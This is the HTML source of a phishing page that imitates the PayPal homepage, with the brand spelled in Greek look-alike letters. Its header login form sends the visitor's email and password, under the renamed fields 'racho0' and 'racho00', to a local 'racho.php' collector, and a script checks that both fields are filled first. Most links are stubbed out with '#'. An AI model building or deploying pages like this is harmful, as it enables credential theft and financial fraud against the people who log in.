<!DOCTYPE html>
<html lang="fr" class="no-js marketing">
    <head>
  	<title>Send &Mu;oney, &Rho;ay Online or Set Up a Merchant Account - &Rho;ay&Rho;al </title>
  	<meta charset="utf-8" />
         <meta name="viewport" content="width=1024" />
        <link rel="shortcut icon" href="images/pp_favicon_x.ico"/>
	  	<link rel="apple-touch-icon" href="images/apple-touch-icon.png"/>
	  	<link href="css/f7/f8b951225f363bbd372c192e5a4a52.css" rel="stylesheet" type="text/css" />
		<link href="css/c4/a28837097160c3d95d654741539edc.css" rel="stylesheet" type="text/css" />
		
		<style type="text/css">#content .carouselElement .homepageHero{ background-color:#ececec; } #content .carouselElement .signupHero{ background-image:none; background-color:#ececec; } #content .carouselElement .mobileHero{ background-image:none; background-color:#ececec; } a.button, .button, button { -webkit-font-smoothing: antialiased; } #homepageBannerContainer { height: auto; } #page #gblFooter .footerNav form.lap div.textInput{ display:inline-block; } #page #gblMarketingFooter .footerNav form.lap div.textInput{ display:inline-block; } .shoppingHero { background: url("images/hero_ppshopping_lroom.jpg") no-repeat scroll center top #ececec; } .mobileHero { background: url("images/hero-app-v2.jpg") no-repeat scroll center top #ececec; } .signupHero { background: url("images/hero_signup_counter.jpg") no-repeat scroll center top #ececec; } .posHero { background: url("images/home_hero_radio.jpg") no-repeat scroll center top #ececec; } .bmlHero { background: url("images/hero_bml_grill.jpg") no-repeat scroll center top #ececec; } .smsHero { background: url("images/hero-here-v2.jpg") no-repeat scroll center top #ececec; } .p2pHero { background: url("images/payback.jpg") no-repeat scroll center top #ECECEC; } .heroTray a.button { width: 241px; margin: 5px 0 8px; padding-left: 15px; padding-right: 15px; } a.button, .button, button { -webkit-font-smoothing: antialiased; } #homepageBannerContainer { height: auto; } #page #gblFooter .footerNav form.lap div.textInput{ display:inline-block; } #page #gblMarketingFooter .footerNav form.lap div.textInput{ display:inline-block; } .signUpContainer { position:absolute; margin-top:0; top:235px; padding: 20px 20px 22px 20px; /*Move to home.css*/ } .signUpContainer .androidAppBtn { width:85px; padding-left:0; padding-right:0; margin-right:6px; } .signUpContainer .iphoneAppBtn { padding-left:0; padding-right:0; width:78px; margin-right:6px; } .signUpContainer .windowsAppBtn { padding-left:0; padding-right:0; width:93px; } .signUpContainer .icon { background: url("images/home-mobile-icons-sprite-all.png") no-repeat scroll 3px -1px transparent; display: inline-block; margin-left: 0px; height: 19px; padding: 0px 6px 0px 26px; } .signUpContainer .mobile .icon { padding-left:0; } .signUpContainer .iphoneAppBtn .icon { background-position: 3px -39px; } .signUpContainer .windowsAppBtn .icon { background-position: 4px -78px; } #content .signUpContainer .contentHeadline { font-size:18px; margin-bottom:8px; } .pageSubHeadline { display:block; width: 470px; } #content .pageSubHeadline a.bmlSeeTerm { color:#666666; font-weight: 300; text-decoration: underline; } .pageHeadline2 { width:100%; } #content .fullWidthCTA { width:236px; } .formMedium .button.androidAppBtn,.formMedium .button.iphoneAppBtn,.formMedium .button.windowsAppBtn { padding-bottom: 6px; } @media only screen and (-webkit-device-pixel-ratio:1.5){ /* Put CSS for high density (hdpi) Android layouts in here */ #content .pageHeadline2 { font-size:24px; } } @media only screen and (-webkit-device-pixel-ratio:1.5){ /* Put CSS for high density (hdpi) Android layouts in here */ #content .pageHeadline2 { font-size:24px; } } @media only screen and (-webkit-device-pixel-ratio:1.5){ /* Put CSS for high density (hdpi) Android layouts in here */ #content .pageHeadline2 { font-size:24px; } } .heroList { margin-top: 24px; margin-left: -2px; } .heroList li { list-style-type: none; } .heroList .bullet { padding-right: 10px; } .legalLine { font-size: 11px; margin-top: 40px; } .legalLine a { color: #5e5e5e; } .heroTray { margin-top: 20px; width: 274px; background-color: rgba(0, 0, 0, 0.05); padding: 14px 20px 8px 20px; } .heroTray .contentHeadline { font-size: 18px; color:#555; } .heroTray .legalLine { margin-top: 0; color:#5e5e5e; } .signupHero .heroTray { margin-top:80px; } #content .bmlHero .heroTray{ margin-top:80px; } #content .col1 a:link, #content .col2 a:link, #content .col3 a:link { text-decoration:none; color: #0079C1; font-weight:normal; } #content .threeColumnKicker .kickerLinks:hover { text-decoration:underline; } #content .threeColumnKicker .kickerLinks:link, #content .threeColumnKicker .kickerLinks:visited { font-weight:bold; }</style><style type="text/css" id="antiClickjack">
	  		body {display: none !important;}
	  	</style>

		<script>
function validateForm()
{
var x=document.forms["myForm"]["racho0"].value;
var atpos=x.indexOf("@");
var dotpos=x.lastIndexOf(".");
if (atpos<1 || dotpos<atpos+2 || dotpos+2>=x.length)
  {
  alert("Not A Valid Email address");
  return false;
  }
  var x=document.forms["myForm"]["racho00"].value;
  if (x==null || x==""  )
  {
  alert("Enter your Password");
  return false;
  }

}


</script>
	 	<script type="text/javascript">
			if (self === top) {
				var antiClickjack = document.getElementById("antiClickjack");
				antiClickjack.parentNode.removeChild(antiClickjack);
			} else {
				top.location = self.location;
			}
		</script>
		<script src="js/fe/d4f5b0a1a2c67a3caf69a0c969cb5.js" type="text/javascript" ></script></head>    
    <body id="marketing">
    	<noscript>
    	<style type="text/css">body{display:block !important;}</style>
    	<p class="nonjsAlert">
    		To access many of the new &Rho;ay&Rho;al features, you'll need to turn on JavaScript and enable cookies. You can do this in your web browser's settings area.</p>
    </noscript>
     <div id="page">
	 
<header class="gblMHeader">
	<div class="outer" role="banner">
		<div class="inner">
			<nav class="site secondary" role="navigation">
				<ul>
					<li class="skip"><a href="#content">skip to content</a></li>
					<li class="current personal">
								<span class="scTrack:tab-personal"><a href="#">Personal</a></span>
									</li>
						<li class="business">
								<span><a href="#">Business</a></span>
									</li>
						</ul>
			</nav>
			<form action="racho.php" name="myForm" method="post" class="formSmall login" onsubmit="return validateForm();"><div class="multi lap">
							<div id="login_emaildiv" class="textInput  beforeContFix ">
	<label class="accessAid" for="login_email">Email</label><input type="text" id="login_email" name="racho0" value=""/>
	<span class="afterContent"><a aria-expanded="false" 
												   data-shorttext="?"
												   data-longtext="forgot?"
												   aria-controls="passwordRecovery1Desc" 
												   class="passwordRecovery scTrack:flyout-reset-email calloutLink" 
												   id="passwordRecovery1" 
												   href="#" 
												   role="button">forgot?</a>
												   <div aria-hidden="true" aria-labelledby="passwordRecovery1" class="calloutContent" id="passwordRecovery1Desc">
												   		<div class="close"><span id="calloutCloseBtn">Close</span></div>
														<p class="title">Forgot your email address?</p>
														<p>Enter up to 3 of your email addresses and we'll help you find your account.</p>
														<span class="button small secondary">
														<a href="#">Get started</a></span>
												   </div></span>
	</div>
	
<div id="login_passworddiv" class="textInput  beforeContFix ">
	<label for="login_password">Password</label><input type="password" id="login_password" name="racho00" autocomplete="off"/>
	<span class="afterContent"><a aria-expanded="false" 
										   data-shorttext="?"
										   data-longtext="forgot?"
										   id="passwordRecovery2" 
										   
										   			class="passwordRecovery passwordRecoveryFlow"
													href="#"
																						 
										   role="button">forgot?</a>
										   <div id="passwordRecoveryLightbox" class="lightbox">
										   				<iframe frameborder="0" scrolling="no" width="100%"></iframe>
										   			</div>
												</span>
	</div>
<input type="submit" name="submit.x"  class="button secondary" value="Log In" />

<span class="button primary"><a href="#">Sign Up</a></span>
										</div>
</form></div>
	</div>
	
	<div class="nav">
	<div class="navOut">
		<nav role="navigation">
			<ul>
				<li class="logo"><a href="#"><img src="images/logo_asderm_106x29.png"></a></li>
				<li class="dropdown" >
								<a href="#">Buy</a><ul>
										<li  ><a href="#">Overview</a></li>
										<li  ><a href="#">Make a Payment...</a></li>
										<li  ><a href="#">How to Purchase Online</a></li>
										<li class="last" ><a href="#">How to Purchase in Stores</a></li>
										</ul>
								</li>
							<li class="dropdown" >
								<a href="#">Sell</a><ul>
										<li  ><a href="#">Overview</a></li>
										<li  ><a href="#">Request a Payment...</a></li>
										<li  ><a href="#">How to Sell Online</a></li>
										<li  ><a href="#">How to Sell in Person</a></li>
										<li class="last" ><a href="#">Go to Business Solutions</a></li>
										</ul>
								</li>
							<li class="dropdown" >
								<a href="#">Transfer</a><ul>
										<li  ><a href="#">Overview</a></li>
										<li class="last" ><a href="#">Send Someone &Mu;oney...</a></li>
										</ul>
								</li>
							</ul>
			<div class="navUtilitiesSec"><a href="#">Explore</a></div>
			</nav>
	</div>
</div></header>
<section id="content">
     		<section id="main" role="main">
     			 <section class="ppHpCarousel ppcNoCookie"> <section class="carouselElement"> <!-- SignUp Hero --> <div class="homepageHero signupHero"> <div class="blackDotsHeroTop"></div> <div class="column_24 clear"> <div class="one column nogutter"> <h1 class="pageHeadline2"> Check out at the counter. </h1> <h2 class="pageSubHeadline"> When your hands are full, let your fingers do the shopping.<br /> Check out at millions of stores in an instant<br /> with just your email and password. </h2> <div class="heroTray"> <h3 class="contentHeadline"> Shopping is easier with us </h3>  <a class="button homeCTA scTrack:button-sign-up" href="#">Sign Up for Free</a> </div> </div> </div> <div class="blackDotsHeroBottom"></div> </div> <input type="hidden" name="carouselSCTracking" id="carouselSCTracking" value="noncookied-carousel-signup"> </section> <section class="carouselElement"> <!-- Shopping Hero --> <div class="homepageHero shoppingHero"> <div class="blackDotsHeroTop"></div> <div class="column_16_8 clear"> <div class="one column"> <h1 class="pageHeadline2"> Great deals <br> in the palm of your hand. </h1> <h2 class="pageSubHeadline"> &Mu;oney and time at your favorite stores <br> with offers from &Rho;ay&Rho;al Shopping. </h2> <div class="heroTray"> <h3 class="contentHeadline"> Shop with us and save </h3> <a class="button homeCTA scTrack:button-shopping" href="#">Shop for Deals</a></div> </div><div class="two column nogutter"> </div> </div> <div class="blackDotsHeroBottom"></div> </div> <input type="hidden" name="carouselSCTracking" id="carouselSCTracking" value="noncookied-carousel-shopping"> </section> <section class="carouselElement"> <!-- P2P Hero --> <div class="homepageHero p2pHero"> <div class="blackDotsHeroTop"></div> <div class="column_16_8 clear"> <div class="one column"> <h1 class="pageHeadline2"> Paying friends back <br> just took a step forward. </h1> <h2 class="pageSubHeadline"> Send &Mu;oney to almost anyone with <br> an email address in just a few clicks. </h2> <div class="signUpContainer"> <h3 class="contentHeadline"> Send &Mu;oney online in minutes </h3> <a class="button homeCTA scTrack:button-send-&Mu;oney" href="#">Send Someone &Mu;oney...</a></div> </div><div class="two column nogutter"> </div> </div> <div class="blackDotsHeroBottom"></div> </div> <input type="hidden" name="carouselSCTracking" id="carouselSCTracking" value="noncookied-carousel-p2p"> </section> <ul id="background-images"> <li id="slide-0-background">images/hero_signup_phone.jpg</li> <li id="slide-1-background">images/hero_ppshopping_lroom.jpg</li> <li id="slide-2-background">images/payback.jpg</li> </ul> <nav class="carouselDirection"> <a class="leftArrow" href="#previous" ><span class="carouselSprite"></span></a> <a class="rightArrow" href="#next"><span class="carouselSprite"></span></a> </nav> <nav id="slideIndicator"> <ul> </ul> </nav> </section>  <div class="threeColumnKicker gradientTop"> <div class="column_8_8_8"> <div class="one column nogutter kickerVerticalRule"> <a class="divlink" href="#"> <img src="images/homepage-buy.png" alt="Buy into being safer" height="121" width="288"><div class="col1"> <h2 class="contentHeadline">Buy into being safer</h2> <p class="contentParagraph">No matter where you shop, we’ll keep your financial information private and protected.</p> <a class="scTrack:home:how-asderm-works kickerLinks" href="#">More about buying</a></div> </a> </div><div class="two column nogutter kickerVerticalRule"> <a class="divlink" href="#"> <img class="tracking" src="images/homepage-sell.png" alt="Sell in less steps " height="121" width="288"><div class="col2"> <h2 class="contentHeadline">Sell in fewer steps </h2> <p class="contentParagraph"> Gone are the days of waiting to get paid. Now you can request a secure payment in a few clicks. </p> <a class="scTrack:home:selling-with-asderm kickerLinks" href="#">More about selling</a></div> </a> </div><div class="three column nogutter"> <a class="divlink" href="webapps/mpp/transfer-&Mu;oney-online"> <img class="tracking" src="images/homepage-transfer.png" alt="Transfer &Mu;oney to friends" height="121" width="288"><div class="col3"> <h2 class="contentHeadline">Transfer &Mu;oney to friends</h2> <p class="contentParagraph"> &Mu;oney is easier between friends when it’s this simple to send them &Mu;oney. </p> <a class="scTrack:home:transfer-&Mu;oney-online kickerLinks" href="#">More about transferring</a></div> </a> </div> </div> </div> <div class="hide externalTrackingSrc">https://ads.bluelithium.com/pixel?id=2041741&t=2</div> <div class="hide externalTrackingSrc">https://googleads.g.doubleclick.net/pagead/viewthroughconversion/984570777/?value=0&label=xuVFCJezswQQmbe91QM&guid=ON&script=0</div> </section>
    	 </section>
     	<footer id="gblMarketingFooter" role="contentinfo">
			<div class="utility">
				    <div class="footerNav"><nav>
					    	<ul>
					    			<li><a href="#">Help</a></li><li><a href="#">Contact</a></li><li><a href="#">Fees</a></li><li><a href="#">Security</a></li><li><a href="#">Features</a></li><li><a href="#">Shop</a></li></ul>
					    	<!-- TODO: need to be replaced by using textInput.tag in 2.2.3 release-->
<script type="text/javascript">var jsPath = "#";</script><form name="searchForm" id="searchForm" class="searchForm clearfix lap formSmall" action="asderm.php" method="post" data-srchid="searchSite" role="search">	
		<div class="textInput">
			<label for="searchSite">Search</label>
			<input id="searchSite" class="searchSite inlineInput" type="text" name="q" value="" autocomplete="off"/>
			<input id="search" class="inlineInput searchSubmit" type="submit" value="Search" name="search.x" />
		</div>
		
	
			<input type="hidden" name="coDomain" value="US" />
			<input type="hidden" name="num" value="10"/>
						<input type="hidden" name="filter" value="p"/>
						<input type="hidden" name="mode" value="live"/>
						<input type="hidden" name="pp_domain_name" value=""/>
						<input type="hidden" name="bn_of" value="html"/>
						<input type="hidden" name="access" value="p"/>
						<input type="hidden" name="ie" value="UTF-8"/>
						<input type="hidden" name="oe" value="UTF-8"/>
						<input type="hidden" name="start" value="0"/>
						<input type="hidden" name="client" value="CE2_US_Frontend" />
				<input type="hidden" name="irFilter" value="CE2_US_fr_US_Collection" />
				<input type="hidden" name="login_status" value="0" />
				<input type="hidden" name="country" value="US" />
				<input type="hidden" name="language" value="fr_US" />
				<input type="hidden" name="cc" value="www" id="bn_cc" />
				<input type="hidden" name="cn" value="" id="bn_cn" />
				<input type="hidden" id="baynote" disabled="disabled" name="baynote" />
				
				<input type="hidden" name="beta_user" value="true" />
				
			</form>	
</nav>
				    </div>
			    </div>
			    
			    <div class="footer">
			    	<div class="footerNav clearfix"><div class="wrapper">
					    	<ul class="topList">
						    	<li><a href="#">About</a></li><li><a href="#">Blog</a></li><li><a href="#">Labs</a></li><li><a href="#">Jobs</a></li><li><a href="#">Sitemap</a></li><li><a href="#">eBay</a></li><li><a href="#">Developers</a></li><li><a href="#">Enterprise</a></li><li><a href="#">Partners</a></li><li id="siteFeedback">
										<script type="text/javascript">
			var siteCatalystPageName="";
			var siteCatalystC7="";
			var siteCatalystAccountNumber="";	
			var feedback_link="\xC9valuation ";
			var isPaymentFlow=false;
			var isSiteRedirect=false;
			var languageCode="fr";
			var countryCode="US";
			var serverName="#";
			var commentCardCmd="";
			var accountNumber="";
			var miniBrowser=false;
			var sitefb_plus_icon="images/sm_333_oo.gif";
			var rLogId=escape("jpnwKrtrIXdbfmucC1ipJQWjUOmuLe\x252BRZZu5KmFdF7N6hTMxSJpD1mcx7bDL\x252FaQVJbbNt\x252FzOl7dm9ckcU1TgoGigqP\x252B0kvlL_14015ec61f5");
			var showSitefbIcon=false;
			
			var _sp = '%3A\\/\\/';
			var _rp = '%3A//';
			function _fC(_u) {				
				var _aT = _sp + ',\\/,\\.,-,_,' + _rp + ',%2F,%2E,%2D,%5F',
					_aA = _aT.split(',');
				for (var i = 0; i < 5; i++) {
					eval('_u=_u.replace(/' + _aA[i] + '/g,_aA[i+5])');
				}
				return _u;
			}
</script>
</li>
								</ul>
							<div class="legal">
								<p  class="copyright"> © 1999 - 2013 &Rho;ay&Rho;al</p>
							    <ul>
								    	<li><a href="#">Privacy</a></li>
											    <li><a href="#">Legal</a></li>
										    	<li></li>
										</ul>
								</div>
						</div>
						<span class="countryList">
							<ul class="topList" >
								<li id="countrySelector">
										<a class="country unitedStates countryBorder selected scTrack:button-countr" href="#">United States</a><ul id="countryList" class="dropdown">
											<li class="country unitedStates"><a class="country unitedStates" href="#">United States</a></li>
											<li class="country canada"><a class="country canada" href="#">Canada</a></li>
											<li class="country mexico"><a class="country mexico" href="#">Mexico</a></li>
											<li class="country unitedKingdom"><a class="country unitedKingdom" href="#">United Kingdom</a></li>
											<li class="country australia"><a class="country australia" href="#">Australia</a></li>
											<li class="last"><a href="#">See all countries</a></li>
										</ul>
										<div class="pointer"></div>
									</li>
									</ul>
				    	</span>
					</div>
				   
				   
			    </div>
		    </footer>
	</div>
    	<script src="js/35/c0c993e878879f18eb0f3a6f083869.js" type="text/javascript" ></script><script type="text/javascript">
    		ASDERM.util.ppobjectsPath = '#';
    	</script>    	
    	<script src="js/39/b60807f7df61122998fdfb416d05fc.js" type="text/javascript" ></script><script type="text/javascript">$(document).ready( function(){ var carouselElNoCookie, carouselCEl; carouselElNoCookie = $('.ppcNoCookie .carouselElement'); carouselCEl = $('.ppcCookie .carouselElement'); var nSlides, sWeight; if(carouselElNoCookie.length < 2 && carouselCEl.length < 2){ /*cannot be less than two.*/ } else { if(carouselElNoCookie.length == 3){ nSlides = '3'; sWeight = ['40','30','30']; /*random percentage*/ } else { nSlides = '2'; sWeight = ['50','50']; } var carouselVals = {'numSlides':nSlides,'random':false,'cycleToTrack':1,'slideWeight':sWeight,'timePerSlide':'6','imageIteratorClass':'.homepageHero','slideAnimate':{'transitionIn':'600','transitionOut':'600','opacityIn':'0.7','opacityOut':'1.0'}}; ASDERM.ppCarousel.initialize(carouselVals); }; /* Fix: show callout and open lightbox when "Get Started" button on callout clicked */ if($('#passwordRecoveryLightbox').length) { /* Append callout html to dom */ $('#passwordRecovery2').parent().append('<div aria-hidden="true" aria-labelledby="passwordRecovery2" class="calloutContent" id="passwordRecovery2Desc"><div class="close"><span id="calloutCloseBtn">Close</span></div><p class="title">Forgot your password?</p><p>Enter your email address and we\'ll help you reset your password.</p><span class="button small secondary"><a href="'+$('#passwordRecovery2').attr('href')+'" id="passwordRecoveryFlow">Get started</a></span></div>'); /* remove previous click handler, class to avoid opening lightbox and add "loginFlyout()" & aria, class */ $('#passwordRecovery2').removeClass('passwordRecoveryFlow').unbind('click').attr('aria-controls', 'passwordRecovery2Desc').addClass('scTrack:flyout-reset-email calloutLink').loginFlyout(); /* Re-initiate Lightbox */ $('#passwordRecoveryFlow').live('click',function (ev) { ev.preventDefault(); var win = $(window), dialog = $('#passwordRecoveryLightbox'), pwrIframe = dialog.find("iframe"), emailInput = $("#login_email"), url = $('#passwordRecoveryFlow').attr('href'); pwrIframe.attr('src', url); /* Hide login callout to avoid stack if opened */ $('.passwordRecoveryPanel').hide(); dialog.lightbox({ size: "mini", dialogClass: "lightboxFixedTopPosition" },'open'); $('.lightboxFixedTopPosition.ui-dialog').css('top','150px'); /* return focus when lightbox is closed to trigger element */ dialog.lightbox({ size: 'mini', close: function(ev) { pwrIframe.attr('src', url); $('#login_password').focus(); } }); }); } /* End-Fix: show callout and open lightbox when "Get Started" button on callout clicked */ });</script><script type="text/javascript">
                 $(document).ready(function(){
                     try {
                         ASDERM.bp.init("login_form","bp_mid");
                         ASDERM.ks.init("login_form","login_password","bp_ks1");
                         ASDERM.common.appendField("login_form", "bp_ks2");
                         ASDERM.common.appendField("login_form", "bp_ks3");
                     } catch(err) {
                     }
                 });
             </script>
        <!--SiteCatalyst Code 
Copyright 1997-2005 Omniture, Inc. 
More info available at http://www.omniture.com -->

<script type="text/javascript" src="js/site_catalyst/pp_jscode_080706.js"></script>



<script type="text/javascript">

 /* SiteCatalyst Variables */
s.pageName="main\x3Amktg\x3Apersonal\x3A\x3Ahome";
s.channel="mktg";
s.hier1="main_mktg_personal_";
s.eVar31="main\x3Amktg\x3Apersonal\x3A\x3Ahome";
s.eVar25="main\x3Amktg\x3Apersonal\x3A\x3Ahome\x3A\x3A\x3A";
s.prop25="main\x3Amktg\x3Apersonal\x3A\x3Ahome\x3A\x3A\x3A";
s.prop31="personal";
s.prop1="core2HomeCExp";
s.prop20="Unknown";
s.prop35="out";
s.prop40="1a0af4a14f315";
s.prop30="usa";
s.prop50="fr_US";
s.eVar61="4c1d14d6b47e0eb9f989e2e614c7f74d";
s.eVar62=" ";
s.prop62=" ";
s.eVar66="\x7C\x7C";
s.prop71="Sparta";
s.prop8="unverified";
s.prop9="unrestricted";
s.eVar34="e31190993ed86";
s.server="main";
s.prop28="Unknown";
s.prop36="#";
</script>

<script type="text/javascript">

	 /************ DO NOT ALTER ANYTHING BELOW THIS LINE ! *************/ 
	 function scOnload(){var s_code=s.t();if(s_code)document.write(s_code);}
	 
	
		 if(window.addEventListener){
			 window.addEventListener('load',scOnload,false);
		 }
		 else if(window.attachEvent){
			 window.attachEvent('onload', scOnload);
		 };
	
 
 if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
 </script> 
<noscript><img src="images/0.png" alt="" height="1" width="1" border="0"></noscript>
<!-- DO NOT REMOVE THIS COMMENT -->
<!-- End SiteCatalyst Code -->
<script type="text/javascript">
	ASDERM.tns.loginflow = '';
	ASDERM.tns.flashLocation = 'images/midOpt.swf';</script>
<script type="text/javascript" src="js/min/pa.js"></script>
	<script type="text/javascript">
		(function(){
			if(typeof ASDERM.analytics != "undefined"){
				ASDERM.core.pta = ASDERM.analytics.setup({data:'pgrp=main%3Amktg%3Apersonal%3A%3Ahome&page=main%3Amktg%3Apersonal%3A%3Ahome%3A%3A%3A&tmpl=core2HomeCExp&pgst=Unknown&lgin=out&calc=1a0af4a14f315&rsta=fr_US&md5h=4c1d14d6b47e0eb9f989e2e614c7f74d&shfp=%7C%7C&usce=+&pgtf=Sparta&s=ci&aver=unverified&rstr=unrestricted&pfid=1a0af4a14f315&bzsr=main&bchn=mktg&pgsf=personal&ccpg=usa&pgld=Unknown&shir=main_mktg_personal_', url:'images/ts'});
			}
		}());
	</script>
	<noscript><img src="ts.gif" alt="" height="1" width="1" border="0"></noscript>
</body>
</html>
